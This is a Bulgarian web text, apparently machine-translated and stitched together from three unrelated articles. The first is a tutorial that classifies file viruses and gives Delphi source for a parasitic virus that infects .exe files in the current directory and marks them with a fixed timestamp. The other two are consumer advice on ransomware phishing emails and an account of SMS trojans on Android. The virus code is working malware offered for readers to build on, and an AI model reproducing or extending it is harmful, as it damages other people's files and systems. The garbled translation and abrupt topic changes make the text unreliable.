Класификация

HLLO - презаписване на език на високо ниво. Такъв вирус презаписва програмата с тялото си. Тези.
програмата се унищожава и когато потребителят се опита да стартира програмата, вирусът се стартира и "заразява" допълнително.

HLLC - Езиков компаньон на високо ниво. Повечето от тези вируси датират от дълбока древност (преди 8-10 години), когато потребителите са имали DOS и са били много мързеливи. Тези вируси търсят файл и без да го променят, създават свое копие, но с разширение .COM. Ако мързелив потребител пише на командна линиясамо името на файла, тогава DOS първо търси COM файла, стартирайки вируса, който първо си върши работата и след това стартира EXE файла. Има още една модификация
HLLC - по-модерен (7 години;)): Вирусът преименува файла, като запазва името, но променя разширението - от EXE на, да речем, OBJ или MAP. Вирусът замества оригиналния файл с неговото тяло. Тези. потребителят стартира вирус, който, след като извърши акта на възпроизвеждане, стартира желаната програма - всички са доволни.

HLLP - Паразитен език на високо ниво. Най-напредналите. Приписвайте тялото им на файла отпред (Вирусът стартира първо, след това възстановява програмата и я стартира) или отзад
- тогава в заглавката на програмата пишем jmp близо до тялото на вируса, в крайна сметка той започва първо.

Можем да оставим самата програма непроменена, тогава тя ще изглежда така:

Какво е MZ, мисля, че познахте 🙂 Това са инициалите на вашия любим Марк Збиковски, които той скромно идентифицира като подпис .exe файл a 🙂 И ги въведох тук само за да разберете
- заразяването става по принципа copy /b virus.exe program.exe и тук няма специални шеги. Не сега. Но ние ще ги съберем заедно с вас
- бъдете здрави :). Е, например: можете да шифровате първите 512 или повече байта от оригиналната програма с произволен алгоритъм, който ви е известен - XOR/XOR, NOT/NOT, ADD/SUB, тогава ще изглежда така:

В този случай структурата на заразения файл няма да бъде толкова ясна.
Не напразно съм тук (в класификацията, в смисъл) толкова разпнат
- паразитен алгоритъм се използва от 90% модерни вируси, независимо от начина им на разпространение. Добре, да продължим:

мрежов вирус. Може да бъде всяко от горните. Различава се по това, че разпространението му не е
ограничена до един компютър, тази инфекция по някакъв начин се изкачва през интернет или локална мрежакъм други коли. Мисля, че редовно вадите по 3-4 такива приятели от сапунерката
- ето пример за мрежов вирус. И веднъж на компютъра на някой друг, той заразява файлове по произволен начин или ИЗОБЩО не заразява.

Макро вируси, скриптови вируси, IRC вируси. Слагам ги в една група, защото са вируси, написани на езици, вградени в приложения (MSOffice :)), скриптове (любимите ви VBS правила тук) и IRC скриптове. Строго погледнато, веднага щом в някое приложение се появи достатъчно мощен (и/или пропусклив) скриптов компонент, те веднага започват да пишат вируси върху него 😉 Между другото, макро вирусите са много прости и лесно се откриват от евристика.

кодиране

Разбрахме 🙂 Хайде, стартирайте delphi, убийте всякакви прозорци и изтрийте всички глупости от прозореца на проекта. Тоест като цяло изтрийте всичко 🙂 Ще работим само с DPR, съдържащ:

програма EVIL_VIRUS;
ИЗПОЛЗВА WINDOWS,SYSUTILS;
започвам
край;

Мисля, че вече разбрахте логиката на вируса от класификацията - възстановете и стартирайте програмата --> изчакайте нейното завършване --> изтрийте "изпълнения файл" (забравих да кажа - ние НЕ ЛЕКУВАМЕ заразената програма, ние прехвърлете оригиналния код в левия файл и стартирайте ПРИМЕР: Заразен файл NOTEPAD.EXE Създайте файла _NOTEPAD.EXE в същата директория с оригиналния код и го стартирайте вече).--> потърсете незаразен файл и заразете. Това е всичко 🙂 Основният дизайн на вируса изглежда така.

Декларирайте сега за вашия могъщ мозък следните променливи и константи:

VaR VirBuf, ProgBuf, MyBuf: масив от char;
SR: TSearchRec;
My,pr: Файл;
ProgSize,резултат: цяло число;
PN,st: низ;
si:Tstartupinfo;
p:tprocessinformation;
заразен: булев;
CONST VirLen: longint= 1000000;

Първият ред са динамични масиви, в които ще напишем съответно тялото на вируса и програмата; Ще бъде записана променливата SR
характеристики на намерения файл-кандидат за инфекция (надявам се, че сте запознати с процедурите FindFirst и FindNext, защото ще става по-зле;)), My и
Pr е файлът, от който започнахме и левият файл с оригиналния програмен код (вече писах за него по-горе). резултат - резултатът от операцията FindFirst, трябва да е равен на нула,
ProgSize - размер на програмния код. Останалото е ясно от това, което следва, освен
заразен - това е знак за заразяване на намерения файл и
VirLen е дължината на вирусния код, ще го разпознаете едва след сватбата. Уф, исках да кажа след компилацията. Тези. компилирате, променяте стойността на константата в изходния код и компилирате отново.
Кодирайте допълнително 🙂 Тук можете да видите кода, отговорен за възстановяването и стартирането на заразената програма:

SetLength(virbuf,VirLen);
AssignFile(my,ParamStr(0));
st:=paramstr(0);
St:= st+#0;
CopyFile (@st,"c:\windows\program.exe",false);
АКО FileSize(my)> VirLen тогава
започвам
//Стартиране на програмата
AssignFile(my,"c:\windows\program.exe);
нулиране (моя);
ProgSize:= FileSize(my)-VirLen;
BlockRead(my,virbuf,virlen);
SetLength(progbuf,pRogSize);
BlockRead(my,progbuf,progSize);
CloseFile(my);
PN:= "_"+ParamStr(0);
Присвояване на файл (pr, pn);
ReWrite(pr);
BlockWrite(pr,progbuf,progSize);
Затваряне на файл (pr);
FillChar(Si, SizeOf(Si) , 0);
със Si do
започвам
cb:= SizeOf(Si);
dwFlags:= startf_UseShowWindow;
wShowWindow:= 4;
край;
PN:= PN+#0;
Createprocess(nil,@PN,nil,nil,false,Create_default_error_mode,nil,nil,si,p);
waitforsingleobject(p.hProcess,infinite);
//Стартира се, програмата е завършена. Нека го изтрием 🙂
ErAsE(pr);
Изтриване (моя);

Всичко тук по принцип е просто и ясно, с изключение на това защо прехвърлих целия заразен файл в директорията на Windows и какво правят редовете от 3 до 5 включително.
И го направих, защото да чета от работещ файлнеудобно и възможно само при използване на CreateFile и ReadFile WinAPI. Ще говоря за кодирането на WinAPI по-късно, сега ще разгледам само основите
- в Делфи.

Тези редове са преобразуване на низ в pchar по народен начин, тъй като сега се борим за всеки байт код. Друг момент: постъпих неправилно, като зададох пътя c:\windows толкова трудно. По-добре използвайте процедурата GetWindowsDirectory, разберете със сигурност 🙂 Всичко останало е ясно без никакви коментари (ако не
спрете да пропускате информатиката;)), да продължим нататък:

резултат:= FindFirst("*.exe",faAnyFile,sr);
WHILE Резултат= 0 DO
започвам
// Проверете за въшки
заразен:= невярно;
IF DateTimeToStr (FileDateToDateTime (fileage (sr.name)))= "08/03/98 06:00:00" then infected:= true;
//Проверено!
IF (infected= false) и (sr.name<>paramstr(0)) тогава
започвам
AssignFile(my,sr.Name);
ReWrite(my);
BlockWrite(my,virbuf,virlen);
BlockWrite(my,progbuf,sr.Size);
CloseFile(my);
FileSetDate (sr.Name,DateTimeToFileDate(StrToDateTime("08/03/98 06:00:00")));
край;
край;

//Ако вирусът работи "чист", т.е. не от заразена програма, след това излезте
край друго спиране;

Какво е вашето набито оковижда тук? Точно така, процедурата FindFirst търси дадена жертва (всеки exe файл от текущата директория), прехвърля нейните характеристики към променливата SR. След това трябва да го проверите за инфекция. Това се прави по оригинален начин: когато е заразен, на файл се присвоява def. дата и час. И всеки файл с такива характеристики се счита за заразен. Всичко останало отново е неприлично просто, така че плавно преминавам към заключението 🙂

Заключение

И така, кодирахме първия си вирус. Засега може да заразява само файлове в текущата директория (въпреки че съм сигурен, че можете лесно да я надстроите;)) и не знае нищо за други директории и интернет. Не се отчайвайте, скоро ще го накараме да работи. Засега си поиграйте с тези редове и изчакайте следващата статия.

Приложение

Ще си позволя да ви дам описание на всички процедури, използвани в статията. Това ще ви помогне да ги потърсите в помощта и да се подготвите за кодиране на сериозни вируси с помощта
WinAPI.

AssignFile - няма аналог в WinAPI - картографира файл
с тип променливаФайл или текстов файл

Reset - аналози на _lopen и CreateFile - отваря се
съществуващ файл и задайте позицията
четене отгоре

ReWrite - _lcreate и CreateFile - създава нов файли
устата позиция за четене до началото. Ако се нахрани
Пренапишете съществуващ файл, неговото съдържание
ще бъде нулиран

BlockRead - _lread и ReadFile - чете в буфера
определено количество данни от файл

BlockWrite - _lwrite и WriteFile - съответно, пише
данни за файл

SeekFile - _llseek и SetFilePointer - преместване на позиция
четене/запис върху отворен файл

CloseFile - _lclose и CloseHandle - затваря отворено
файл

Erase - DeleteFile - изтриване на файл

FindFirst - FindFirstFile - търсене на файл по критерии

FindNext - FindNextFile - търсене на следващия файл

Обадете се на администраторите на екзорсистите! Главният счетоводител пипна мощен вирус, всичко го няма! Честа, честа ситуация, базирана на човешкия фактор, новите вирусни тенденции и решителността на хакерите. И наистина, защо сами да копаете в софтуера на някой друг, ако можете да разчитате на служителите на компанията в това.

Да, продуктите на големи публични и частни компании непрекъснато се хакват, въпреки че стотици опитни хора работят върху тяхното създаване и поддръжка.

И още повече, обикновеният човек няма какво да противопостави на хакерите. В същото време никой не се нуждае от един самотен акаунт, целта на хакерите е да получат голяма база от потенциални жертви и да я обработват с верижни писма, спам или вируси. И ние сами разпространяваме цялата лично-обществена информация надясно и наляво.

Най-новите вирусни тенденции

Отличителна черта на всички съвременни вируси и хакерски техники е, че те взаимодействат с човек, а не със система. Тоест самата жертва започва процеса. Нарича се " социално инженерство"- метод за незаконен достъп до информация, основан на характеристиките на човешката психология. И ако по-рано нападателите трябваше да се превърнат в истински детективи, да проследяват своите цели, да общуват, понякога дори да си намерят работа в хакната компания, сега можем да ви благодарим социални мрежи. Те значително опростиха и ускориха процеса на събиране на информация.

Преминавайки през VK, Twitter, FB и Instagram на вашата цел, можете да получите точния профил на човек с неговия телефонен номер, поща, имена на родители, приятели и други подробности. И всичко това е безплатно и доброволно - използвай го, скъпа!

Ами ако измамниците получат достъп до корпоративна пощаедин от вашите служители, спамът заплашва не само всички в компанията, но и вашите клиенти. В друг случай хакерите ще деактивират компютъра на служителя за дълго време, като изпратят някакъв вид „доклад“ по пощата.

Хакери планират атаки срещу тези, които работят с ценна информация - секретарки, мениджъри, счетоводители, HR.

Тъй като възстановяването на документи, системи, уебсайтове или получаването на пароли ще ви струва доста паритрябва да разберем с какво си имаме работа. За да не могат всички тези „социални инженери“ да ви осребрят, нека анализираме една от най-новите вирусни схеми.

"Криптисти"

Вирусът рансъмуер се разпространява чрез електронна пощапод прикритието на сериозни документи: съдебни призовки, фактури, заявки от данъчната служба. И за да не го инсталирате сами, трябва да погледнете и в двете посоки. Нашите техници специално анализираха един такъв вирус, за да можем да ви покажем за какво да внимавате:

Ние следваме ръцете на тези магьосници:

  • Заплашително заглавие. „Известие за явяване в съда“ означава „Призоваване в съда“. Момчетата се опитват да сплашат и принудят потребителя да отвори писмото.
  • Адрес на изпращача - [имейл защитен]Ясно показва, че това не е официално писмо, а спамер/хакер.
  • Архив на писма. Там има файл, който трябва незабавно да ви предупреди (името на файла включва .doc, но разширението js - вирусът се маскира като документ на Word)

внимание!Ако компютърът е бил заразен с ransomware, тогава с вероятност от 95% информацията ще бъде загубена завинаги. След като злонамереният файл бъде изтеглен и стартиран, се осъществява обаждане до отдалечен сървър, от който се изтегля вирусният код. Всички данни на компютъра са криптирани с произволна последователност от знаци.

За да "декодирате" файловете, ще ви трябва ключ, който има само хакер. Измамникът обещава да декриптира обратно информацията срещу определена сума, но не е сигурно, че това ще се случи. За какво? Много по-лесно е да оставиш човек без пари и без данни: договори, актове, поръчки, всяка ценна и чувствителна информация. Та какво правиш резервни копияособено важна документация, ще спите по-добре. В тази ситуация това е единствената ви 100% защита срещу вируси.

Обърнете внимание на горните функции и ще можете да предотвратите опасни случаи на блокиране на компютри и изтриване важна информация. Във всеки случай коригирането на последствията от критични уязвимости ще бъде много по-скъпо от вземането на предпазни мерки.

И така, ето още 6 съвета за откриване на вируси и предотвратяване на инфекция:

1. Актуализирайте вашата операционна система и програми редовно.Важните актуализации, които се инсталират автоматично по подразбиране, могат да бъдат деактивирани. Но не го правете, защото новите версии често затварят откритите дупки в софтуерната сигурност.

2. Инсталирайте антивирусна програма и редовно актуализирайте базата данни с вируси. Всеки ден има 100 хиляди нови вируса!

3. Разрешете показването на файлови разширения: Control Panel\Folder Options\View\Advanced Options, премахнете отметката от опцията "Hide extensions for known file types" и щракнете върху OK. По този начин винаги ще виждате истинското файлово разширение. Най-често маскираните вируси изглеждат така: filename.doc.js и filename.pdf.exe. Истинските файлови разширения са js и exe и всичко преди тях е част от името на файла.

4. Архивирайте вашите важни файлове – работни документи и снимки. Периодичност Резервно копиетрябва да изберете в зависимост от честотата на промените на файловете. За съхранение на резервни копия можете да използвате облачна услуга, ако ви позволява да се върнете към по-стари версии на файлове и да настроите ръчна синхронизация. Тогава, в случай на инфекция на компютъра, вирусът няма да попадне в облака. Също така препоръчваме да съхранявате копие на вашите важни данни в архив.Повечето вируси не могат да проникнат в архива и цялата архивирана информация се възстановява след дезинфекция на компютъра.

5. Повишете професионалната грамотност на вашите специалисти!Както вече казахме, хакерите приспособяват своите атаки към нашата психология и непрекъснато подобряват своите техники. Не очаквайте някой друг освен вашата компания и екип да кликне/качи/въведе вашите данни. Всеки може да се хване, задачата е само да изберете правилната кука за човек. Затова обучавайте служителите си, поне поотделно, поне в екип, поне по игрив начин, поне по някакъв начин!

6. Следете внимателно писмата в пощата, съобщенията в корпоративните месинджъри и всяка друга входяща информация. Проверете имейл адресите, прикачените файлове и съдържанието на имейлите на подателите. Повечето вируси трябва да се стартират ръчно, преди да навредят на компютъра ви.

Наистина се надяваме, че четете тази статия за предварителен преглед, а не защото всичко вече е лошо. Пожелаваме ви никога да не се сблъсквате с тотален неконтролиран спам, липсваща документация за шест месеца и други приятни последици от хванатите вируси. Следвайте шестте стъпки по-горе, дръжте очите си отворени и запазете информацията си поверителна!

Потребителите не винаги могат да разпознаят вирус в мобилния си телефон и съответно не е възможно да изтрият злонамерената програма или да предприемат каквото и да е действие, преди вирусът да получи достъп до лични данни.

На този моментСмартфоните с Android се считат за най-уязвими. Нов вирус се появи чрез SMS на Android.

В смартфони с отворен код, което всъщност е операционна система Android, новите вируси се разпространяват с невероятна скорост.

Сега те са се променили. Преди те се опитваха да използват пари само в мобилни телефони, но днес са под прицела банкови картии всички средства, които са в интернет банката. Измамниците се интересуват предимно от смартфони, които поддържат услугата Mobile Bank. Тя ви позволява да откраднете пари от сметката на жертвата към номера на измамника. За да направят това, те изпращат вирус чрез SMS до Android.

Как действат измамниците

Първият такъв вирус се активира в началото на лятото на 2017 г. Опасността е, че троянският кон работи дистанционно на смартфон с Android.

Нападателите изпращат SMS до желания номер, така че за да идентифицират наличието на този вирус в мобилната си притурка, собствениците на смартфони трябва да обърнат внимание на увеличаването на броя на SMS съобщенията на стойност 100 рубли всяко. В резултат на това от мобилната сметка на собственика на смартфона се тегли сума, кратна на 100.

За да спечели значителни пари, нападателят е принуден да изпрати няколко SMS троянски коне от номера на жертвата си. В крайна сметка той не е единственият, който работи в тази измамна верига.

Троянският кон се настанява в джаджата на жертвата и изпраща SMS съобщения от номера на жертвата до „скъпия“ номер на измамниците. И именно за тези SMS съобщения, адресирани до този „скъп“ номер, жертвата се таксува по 100 рубли. за всяко неразрешено SMS съобщение.

Посредници в тази схема могат да бъдат телеком оператор, доставчик и други партньори, които може да не знаят за триковете на измамниците. За да покрие всички разходи и да спечели пари, нападателят трябва да изтегли най-малко 1000 рубли от всеки номер.

В същото време не може да се изключи възможността собствениците на смартфони да се оплачат на своя оператор за кражба на пари. И тогава предприемат ответни мерки, които предотвратяват измамите. Например, те могат да въведат необходимия вход допълнително потвърждениепреди дебитиране на пари и т.н. В такава ситуация нападателите са принудени да търсят нови начини за измама.

Благодарение на тези фактори се появи още един троянски кон. Този представител на Trojan-SMS също изпълнява команди от отдалечен сървър.

Нов вирусе по-гъвкав и перфектно ориентиран при всякакви условия, като вече взема предвид бариерите мобилен оператор, и дори състоянието на акаунта на абоната и времето на транзакциите.

Как функционира вирусът

Новият вирус е латентен – няма независимост. Дори веднъж в смартфона, той не се появява по никакъв начин. Нуждае се от дистанционна команда от собственика на телефона, за да работи.

За това се използва така наречената POST заявка. Предназначен е за заявка, при която уеб сървърът приема за съхранение данните, включени в тялото на съобщението. Често се използва, например, за изтегляне на файл.

Използването на POST заявка ви позволява да се свържете с отдалечен сървъри получават съответната команда, при получаването на която троянският кон започва да изпраща скъпи SMS съобщения от номерата на своите жертви към номерата на измамниците.

Как работи новият троянски кон? Например, програмата автоматично изпраща SMS съобщения с една дума "БАЛАНС" на номер, който поддържа "Мобилно банкиране".

Изпращане на SMS съобщение c кратък номер, по този начин измамниците могат да проверят дали номерът на жертвата е свързан с банкова сметка и какво е състоянието на сметката.

Примери от реалния живот

Например Сбербанк има номер, от който се изпращат съобщения - 900. Когато пристигне съобщение „БАЛАНС“ (или евентуално на руски „баланс“) от подателя 900, тогава собственикът на телефона, доверявайки се на Сбербанк и е сигурен че това съобщение е от тази банка, отваря съобщението и отговаря на него, като иска да разбере какво се е случило с баланса. Така измамниците получават отговор на своя SMS, което за тях означава, че a банкова карта. Освен това им става ясно, че тази карта може да се управлява чрез SMS команди, което е включено в услугата Мобилно банкиране. И тогава, както се казва, "въпрос на технология".

Един от моите приятели наскоро получи съобщения от кратък номер 4-74-1, който е регистриран в мобилната банка на Сбербанк със съобщение „Услугата не е достъпна, моля, опитайте отново по-късно“. По очевидни причини тя не изпрати отговор, тъй като вече знаеше за възможни заплахи. Очевидно това са същите измамници, маскирани като мобилна банка, които се опитват да изчислят нейната реакция по този начин и да определят дали мобилна банка е инсталирана на нейния смартфон.